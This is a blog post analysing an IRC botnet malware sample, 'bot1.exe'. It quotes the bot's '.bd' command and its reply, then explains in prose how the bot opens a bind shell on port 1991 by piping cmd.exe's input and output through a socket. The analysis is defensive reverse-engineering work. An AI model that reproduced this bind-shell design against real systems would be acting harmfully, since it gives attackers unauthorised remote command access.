Tuesday, 5 January 2010

bot1.exe part11 - bindshell command


When the bindshell command is issued, firstly the usual notifications are created, and sent back to the channel:

15:41 <@unchk> .bd
17:10 < USA|28691> -bindshell- Server started on: 172.16.29.128:1991.

After this, a thread is created, and it's thread handle is stored (this handle is used when the command 'bindshellstop' is issued to call TerminateThread with it as argument).
The thread takes as argument the socket handle responsible for the communication with the irc server, and proceeds with the creation of listener-socket and binds it to local port 1991.
Once the socket is bound, the thread awaits for connections. If a connection is received, a new process (cmd.exe) is created, with the standard input/output/error overriden with the read and write ends of two anonymous pipes according to this:

Standard Input - Read Handle of pipe 1
Standard Output - Write Handle of pipe 2
Standard Error - Dup'ed Write Handle of pipe 2

Afterwards two threads are created:
- The first one is responsible for reading from the handle hReadPipe2 (the read handle from the second pipe) and sending this data down the connected_socket_handle. Since the write handle of pipe2 is acting as the process standard output of the cmd.exe created process, this socket is actually sending back the output of cmd.exe.
- The second thread, is in time, responsible for receiving data from the connected_socket_handle and writing it to the handle hWritePipe1. Since the standard input of the created cmd.exe is the read handle of pipe 1, writing data to hWritePipe1 will result in the contents read from the socket being passed to cmd.exe

Once both threads are created, the original thread calls WaitForSingleObject with dwMilliseconds set to INFINITE on the child process. Once the child process exits, the main thread terminates the created threds, terminates the created process, closes the four pipe handles and finally calls CloseHandle on the child process' process handle, thread handle and jumps back to the accept, to receive new connections.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)